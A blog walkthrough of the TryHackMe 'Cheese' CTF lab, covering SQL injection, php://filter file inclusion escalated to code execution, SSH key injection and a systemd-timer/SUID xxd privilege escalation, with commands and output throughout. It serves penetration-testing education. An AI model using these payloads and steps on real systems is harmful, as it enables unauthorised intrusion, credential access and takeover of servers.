Post

Tryhackme Cheese Walkthrough - Pentest Lab Notes

Posted Updated
By
3 min read
Tryhackme Cheese Walkthrough - Pentest Lab Notes

CheeseCTF Writeup - TryHackMe

Difficulty: Medium-High

This is a write-up for the CheeseCTF room on TryHackMe, which involves exploiting a vulnerable web application to escalate privileges and capture the user and root flags.

Table of Contents

  • Reconnaissance
  • Foothold
  • Privilege Escalation
  • Root Flag

Reconnaissance

Initial Scan

We start by scanning the target with Nmap to discover any open ports:

1

nmap -sC -sV -p- 10.10.145.132

We find a website with a login form. After attempting manual SQL injection exploits, we turn to sqlmap for further testing:

1

 sqlmap -r login

sqlmap identifies a vulnerability in the username parameter and suggests MySQL as the back-end DBMS. We attempt an injection and receive a redirect to a hidden page:

1

http://10.10.145.132/secret-script.php?file=supersecretadminpanel.html

After further exploration, we notice that the site is vulnerable to Local File Inclusion (LFI) via the php://filter wrapper.

Exploit LFI

We test the LFI vulnerability by including the /etc/passwd file:

1

http://10.10.145.132/secret-script.php?file=php://filter/resource=../../../etc/passwd

This reveals a list of users, including comte, which we target for further enumeration.

Foothold

Exploiting LFI to RCE

By chaining multiple PHP filters, we craft a payload that executes PHP code remotely on the server:

1

 python3 php_filter_chain_generator.py --chain '<?php phpinfo(); ?>'

We use the generated payload to trigger PHP code execution via the LFI:

1

http://10.10.145.132/secret-script.php?file=php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.base64-decode/resource=php://temp

This confirms we can run arbitrary PHP code on the server.

Gaining Access

We then use a reverse shell payload to gain access as the www-data user:

1

http://10.10.145.132/secret-script.php?0=id&file=php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=php://temp

We receive the shell output confirming we are logged in as www-data:

uid=33(www-data) gid=33(www-data) groups=33(www-data)

Next, we inspect the comte user’s home directory and find an authorized_keys file inside the .ssh folder, where we can add our public SSH key.

SSH Key Injection

We generate an SSH key pair, then add the public key to the authorized_keys file:

1
2
3
4

 ssh-keygen -t rsa
 chmod 600 temp_id_rsa
 cat temp_id_rsa.pub
 echo "<public_key>" >> authorized_keys

After doing so, we can SSH into the comte user’s account and retrieve the user flag:

1

 ssh -i temp_id_rsa comte@10.10.145.132

User flag

1
2

 cat user.txt
THM{9f2c**REDACTED**b17a}

Privilege Escalation

Sudo Privileges

As the comte user, we check for available sudo privileges:

1

 sudo -l

We discover that comte can run several systemctl commands without a password:

1
2
3
4

(ALL) NOPASSWD: /bin/systemctl daemon-reload
(ALL) NOPASSWD: /bin/systemctl restart exploit.timer
(ALL) NOPASSWD: /bin/systemctl start exploit.timer
(ALL) NOPASSWD: /bin/systemctl enable exploit.timer

This indicates that the user can manipulate a systemd timer called exploit.timer. We check the system for any exploit.service files:

1

 cat /etc/systemd/system/*.service

We find that the exploit.service copies the xxd binary to the /opt directory and sets the SUID bit, allowing anyone to execute it with root privileges.

Fixing the Exploit Timer

The timer file /etc/systemd/system/exploit.timer is misconfigured with an empty OnBootSec value. We modify it to trigger immediately upon activation:

1

 sudo nano /etc/systemd/system/exploit.timer

We set OnBootSec and OnUnitActiveSec to 0 for immediate execution:

[Unit] Description=Exploit Timer

[Timer] OnUnitActiveSec=0 OnBootSec=0

[Install] WantedBy=timers.target

Triggering the Exploit

We start the timer:

1

sudo systemctl start exploit.timer

This triggers the associated exploit.service, which places the xxd binary in /opt with SUID. We use xxd to read the root.txt flag:

1

 /opt/xxd "/root/root.txt" | xxd -r

THM{dca75REDACTED167c}

Root Flag

Once we gain root access, we are able to retrieve the root flag located in /root/root.txt:

1
2

 cat /root/root.txt
THM{dca75**REDACTED**167c}

Conclusion

This CTF involved several vulnerabilities, including SQL injection, Local File Inclusion (LFI), Remote Code Execution (RCE), and privilege escalation through systemd timers and SUID binaries. Each step required a careful combination of techniques to gain access to both the user and root flags. Tools Used

nmap: Network scanning

sqlmap: Automated SQL injection

php_filter_chain_generator: LFI to RCE exploitation

ssh-keygen: SSH key generation

systemctl: Interacting with systemd services

xxd: File inspection with SUID privilege escalation

tryhackme, walkthrough
ctf enumeration exploit Cheese writeups htb writeups tryhackme Linux wordpress cracking walkthrough
This post is licensed under CC BY 4.0 by the author.